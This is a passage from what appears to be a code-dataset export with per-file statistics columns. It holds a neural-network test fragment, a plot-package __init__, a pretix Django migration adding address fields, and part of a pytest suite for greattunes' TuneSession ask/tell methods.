0., 1., 0. ,0. ,0. , 0., 0. , 0., 0., 0., 0., 0. , 0., 0., 0., 0. , 0. , 0.,
0. ,0. , 1. , 0., 0.02857143 , 0.02857143, 0.02857143 , 0.02857143 , 0.02857143 , 0.02857143,
0.02857143 , 0.02857143, 0.02857143 , 0.02857143 , 0.02857143 ,0.02857143,
0.02857143 , 0.02857143 , 0.02857143 , 0.,0.02857143, 0.,
0.02857143 ,0. , 0.02857143 , 0.02857143 , 0.02857143 ,0.02857143,
0.02857143, 0., 0.02857143 ,0.02857143, 0.02857143 , 0.02857143,
0.02857143 ,0.02857143 ,0.02857143, 0.02857143 ,0.02857143, 0.02857143,
0.02857143 , 0.02857143 ,0., 0.02857143])
Y = NN.test(input)
print(Y*22) | 53.666667 | 101 | 0.56646 | 136 | 805 | 3.352941 | 0.125 | 0.171053 | 0.745614 | 1.144737 | 0.789474 | 0.789474 | 0.789474 | 0.785088 | 0.785088 | 0.785088 | 0 | 0.572785 | 0.214907 | 805 | 15 | 102 | 53.666667 | 0.148734 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.071429 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
02602a7446e38ce00ca7888e7b0ec6bd6c9e0781 | 230 | py | Python | tools/plot/__init__.py | LJ-Jiahe/fuzzy_measure_fusion | d265f3266548eb5f7a629710b200d6b253955cd8 | [
"MIT"
] | null | null | null | tools/plot/__init__.py | LJ-Jiahe/fuzzy_measure_fusion | d265f3266548eb5f7a629710b200d6b253955cd8 | [
"MIT"
] | null | null | null | tools/plot/__init__.py | LJ-Jiahe/fuzzy_measure_fusion | d265f3266548eb5f7a629710b200d6b253955cd8 | [
"MIT"
] | null | null | null | from tools.plot.plot_distributions import *
from tools.plot.plot_models import *
from tools.plot.plot_NPP import *
from tools.plot.plot_operators import *
from tools.plot.plot_seenVSunseen import *
from tools.plot.plot_NS import * | 38.333333 | 43 | 0.821739 | 36 | 230 | 5.083333 | 0.277778 | 0.295082 | 0.42623 | 0.557377 | 0.628415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 230 | 6 | 44 | 38.333333 | 0.884058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5a0a6855b45d51ebddeb09832a67a6fa86d93b3f | 2,308 | py | Python | src/pretix/base/migrations/0150_auto_20200401_1123.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 1,248 | 2015-04-24T13:32:06.000Z | 2022-03-29T07:01:36.000Z | src/pretix/base/migrations/0150_auto_20200401_1123.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 2,113 | 2015-02-18T18:58:16.000Z | 2022-03-31T11:12:32.000Z | src/pretix/base/migrations/0150_auto_20200401_1123.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 453 | 2015-05-13T09:29:06.000Z | 2022-03-24T13:39:16.000Z | # Generated by Django 3.0.4 on 2020-04-01 11:24
import django_countries.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0149_order_cancellation_date'),
]
operations = [
migrations.AddField(
model_name='cartposition',
name='city',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='cartposition',
name='company',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='cartposition',
name='country',
field=django_countries.fields.CountryField(max_length=2, null=True),
),
migrations.AddField(
model_name='cartposition',
name='state',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='cartposition',
name='street',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='cartposition',
name='zipcode',
field=models.CharField(max_length=30, null=True),
),
migrations.AddField(
model_name='orderposition',
name='city',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='orderposition',
name='company',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='orderposition',
name='country',
field=django_countries.fields.CountryField(max_length=2, null=True),
),
migrations.AddField(
model_name='orderposition',
name='state',
field=models.CharField(max_length=255, null=True),
),
migrations.AddField(
model_name='orderposition',
name='street',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='orderposition',
name='zipcode',
field=models.CharField(max_length=30, null=True),
),
]
| 30.773333 | 80 | 0.560225 | 211 | 2,308 | 5.995261 | 0.236967 | 0.170751 | 0.218182 | 0.256126 | 0.853755 | 0.853755 | 0.822925 | 0.822925 | 0.751779 | 0.751779 | 0 | 0.027599 | 0.324957 | 2,308 | 74 | 81 | 31.189189 | 0.784339 | 0.019497 | 0 | 0.882353 | 1 | 0 | 0.114993 | 0.012384 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029412 | 0 | 0.073529 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
5a0d23a04b4f26a0f486d191855f5b0e9b25631e | 66,101 | py | Python | tests/integration/test_CreativeProject_ask_tell_functional.py | svedel/greattunes | e241d0f6a30479b600d85aafabf27058d3fd1072 | [
"MIT"
] | null | null | null | tests/integration/test_CreativeProject_ask_tell_functional.py | svedel/greattunes | e241d0f6a30479b600d85aafabf27058d3fd1072 | [
"MIT"
] | 20 | 2021-07-14T06:44:56.000Z | 2022-03-17T05:06:23.000Z | tests/integration/test_CreativeProject_ask_tell_functional.py | svedel/greattunes | e241d0f6a30479b600d85aafabf27058d3fd1072 | [
"MIT"
] | null | null | null | import functools
import pytest
import torch
from greattunes import TuneSession
from greattunes.data_format_mappings import tensor2pretty_response, tensor2pretty_covariate
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, random_start",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, True], # case 1 with random start
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, True], # case 2 with random start
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False]
]
)
def test_CreativeProject_ask_integration_test_works(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, random_start):
"""
test the positive cases for TuneSession.ask method.
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# run the method
cc.ask()
# check that an entry has been added to cls.proposed_X
if train_Y is not None:
assert cc.proposed_X.size()[0] == train_X.size()[0] + 1
assert cc.proposed_X[-1].size()[0] == train_X.size()[1] # check that the new candidate has the right number of entries
else:
assert cc.proposed_X.size()[0] == 1
# check that a model and an acquisition function have been assigned if starting from no data (train_X, train_Y is None)
if train_Y is not None:
assert cc.acq_func["object"] is not None
assert cc.model["model"] is not None
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated
assert cc.model["covars_proposed_iter"] == covars_proposed_iter +1
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, error_msg",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, torch.tensor([[0.8]], dtype=torch.double), 0, 0, 0, "greattunes.greattunes._acq_func.AcqFunction.set_acq_func: no surrogate model set (self.model['model'] is None)"], # the case where no COVARIATE data is available
[[(1, 0.5, 1.5)], "SingleTaskGP", None, torch.tensor([[0.8], [22]], dtype=torch.double), 0, 0, 0, "greattunes.greattunes._acq_func.AcqFunction.set_acq_func: no surrogate model set (self.model['model'] is None)"], # the case where no COVARIATE data is available, multiple observations
]
)
def test_CreativeProject_ask_integration_test_fails(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, error_msg):
"""
test the negative cases for TuneSession.ask method. Currently testing the case where only train_Y data has been
added, not train_X data
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# run the method
with pytest.raises(Exception) as e:
cc.ask()
assert str(e.value) == error_msg
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 2, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 2, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 2, 1, 1]
]
)
def test_CreativeProject_tell_integration_test_works(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, monkeypatch):
"""
test the positive cases for TuneSession.tell method. Monkeypatch "_read_covars_manual_input" and
"_read_response_manual_input" from ._observe.py to circumvent manual input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the method
cc.tell()
# assert that a model has been added (start from cc.model["model"] = None)
assert cc.model["model"] is not None
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 1, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 1, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1]
]
)
def test_CreativeProject_tell_integration_test_works_overwrite(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, monkeypatch):
"""
test the positive case for TuneSession.tell method where last datapoint is overwritten (controlled by
covars_proposed_iter <= covars_sampled_iter). Monkeypatch "_read_covars_manual_input" and
"_read_response_manual_input" from ._observe.py to circumvent manual input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the method
cc.tell()
# assert that a model has been added (start from cc.model["model"] = None)
assert cc.model["model"] is not None
# assert that NO new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0]
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation (last row overwritten)
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that NO new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0]
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation (last row overwritten)
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
# add a test that looks for failures in tell (e.g. incorrect added input: make sure nothing is updated)
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, covars_cand, resp_cand, error_msg",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2]], dtype=torch.double), torch.tensor([[23]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([0.8000], dtype=torch.float64)', but got 'tensor([[1., 2.]], dtype=torch.float64)'"], # fail on train_X
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2]], dtype=torch.double), torch.tensor([[23]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([0.8000], dtype=torch.float64)', but got 'tensor([[1., 2.]], dtype=torch.float64)'"], # fail on train_X
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1]], dtype=torch.double), torch.tensor([[23, 11]], dtype=torch.double), "greattunes._observe._get_and_verify_response_input: incorrect number of variables provided. Was expecting input of size (1,1) but received torch.Size([1, 2])"], # fail on train_Y
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2]], dtype=torch.double), torch.tensor([[23]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([ 0.8000, 0.2000, 102.0000], dtype=torch.float64)', but got 'tensor([[1., 2.]], dtype=torch.float64)'"], # fail on train_X, too few entries
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2, 3]], dtype=torch.double), torch.tensor([], dtype=torch.double), "greattunes._observe._get_and_verify_response_input: incorrect number of variables provided. Was expecting input of size (1,1) but received torch.Size([0])"], # fail on train_Y, too few entries
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2]], dtype=torch.double), torch.tensor([], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([ 0.8000, 0.2000, 102.0000], dtype=torch.float64)', but got 'tensor([[1., 2.]], dtype=torch.float64)'"], # too few in both train_X and train_Y, fail on train_X since this comes first
]
)
def test_CreativeProject_tell_integration_test_fails(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, covars_cand, resp_cand,
error_msg, monkeypatch):
"""
test that a failure in "tell" will cause an error and not update any counters. Monkeypatch
"_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual input via
builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# original model state
model_state = cc.model["model"]
# monkeypatch "_read_covars_manual_input"
candidate_tensor = covars_cand
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = resp_cand
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
with pytest.raises(Exception) as e:
# run the method
cc.tell()
assert str(e.value) == error_msg
# assert that stored train_X is not updated
assert cc.train_X.size()[0] == train_X.size()[0]
assert cc.train_X.size()[1] == train_X.size()[1]
# assert that stored train_Y is not updated
assert cc.train_Y.size()[0] == train_Y.size()[0]
assert cc.train_Y.size()[1] == train_Y.size()[1]
# assert that stored surrogate model is not updated
assert cc.model["model"] == model_state
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, random_start",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, True], # case 1 with random start
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, True], # case 2 with random start
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False]
]
)
def test_CreativeProject_integration_ask_tell_one_loop_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, random_start, monkeypatch):
"""
test that a single loop of ask/tell works: creates a candidate, creates a model, stores covariates and response.
Monkeypatch "_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual
input via builtins.input. Does not use the kwargs for covariates
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell()
### assert for ask ###
# check that an entry has been added to cls.proposed_X
if train_Y is not None:
assert cc.proposed_X.size()[0] == train_X.size()[0] + 1
assert cc.proposed_X[-1].size()[0] == train_X.size()[1] # check that the new candidate has the right number of entries
else:
assert cc.proposed_X.size()[0] == 1
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated
assert cc.model["covars_proposed_iter"] == covars_proposed_iter + 1
### check for tell ###
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
### check that acquisition function and model have been added
# check that a model function has been assigned (should happen in all cases as part of tell)
assert cc.model["model"] is not None
# check that an acquisition function has been added (only if some data present in train_X, train_Y at first step)
if train_X is not None:
assert cc.acq_func["object"] is not None
# need:
# - integration test for kwargs for response, nothing else (positive and negative)
# - integration test for kwargs for covars and response (positive and negative)
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_covariates, random_start",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), True], # case 1 with random start
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), True], # case 2 with random start
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8]], dtype=torch.double), False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8, 0.2, 103]], dtype=torch.double), False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8, 0.2, 103]], dtype=torch.double), False]
]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_covars_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_covariates, random_start,
monkeypatch):
"""
test that a single loop of ask/tell works when providing covars as kwarg to tell: creates a candidate, creates a
model, stores covariates and response. Monkeypatch "_read_response_manual_input" from ._observe.py to circumvent
manual input via builtins.input and provides covariates via kwargs
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# # monkeypatch "_read_covars_manual_input"
# candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
#
# def mock_read_covars_manual_input(additional_text):
# return candidate_tensor
#
# monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell(covar_obs=kwarg_covariates)
### check for tell (no reason to assert for ask)###
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == kwarg_covariates[0, i].item() #candidate_tensor[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
### check that acquisition function and model have been added
# check that a model function has been assigned (should happen in all cases as part of tell)
assert cc.model["model"] is not None
# check that an acquisition function has been added (only if some data present in train_X, train_Y at first step)
if train_X is not None:
assert cc.acq_func["object"] is not None
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_response, random_start",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), True], # case 1 with random start
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), True], # case 2 with random start
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8]], dtype=torch.double), False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[103]], dtype=torch.double), False],
